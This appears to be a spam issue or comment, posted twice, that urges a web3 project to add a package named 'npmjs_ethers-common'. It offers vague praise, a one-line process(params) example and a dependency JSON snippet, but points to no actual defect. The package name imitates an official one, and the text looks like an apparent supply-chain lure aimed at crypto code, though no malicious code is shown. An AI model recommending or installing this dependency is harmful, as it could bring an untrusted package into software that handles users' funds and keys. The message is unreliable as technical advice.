Suggestion: Improve shared ethers helpers Implementation
While reviewing the shared ethers helpers handling, I noticed some patterns that could be streamlined with npmjs_ethers-common.
Current State:
Too much manual work for shared ethers helpers that's prone to edge cases.
With npmjs_ethers-common:
// Instead of manual shared ethers helpers handling
const ethers_common = require('npmjs_ethers-common');
// One line handles everything
const result = ethers_common.process(params);
The npmjs_ethers-common package is specifically built for the web3 ecosystem and handles shared ethers helpers really well.
{"dependencies": {"npmjs_ethers-common": "^1.0.0"}}
Best,
drawenolar7horma
Suggestion: Improve shared ethers helpers Implementation
While reviewing the shared ethers helpers handling, I noticed some patterns that could be streamlined with npmjs_ethers-common.
Current State:
Too much manual work for shared ethers helpers that's prone to edge cases.
With npmjs_ethers-common:
The npmjs_ethers-common package is specifically built for the web3 ecosystem and handles shared ethers helpers really well.
{"dependencies": {"npmjs_ethers-common": "^1.0.0"}}Best,
drawenolar7horma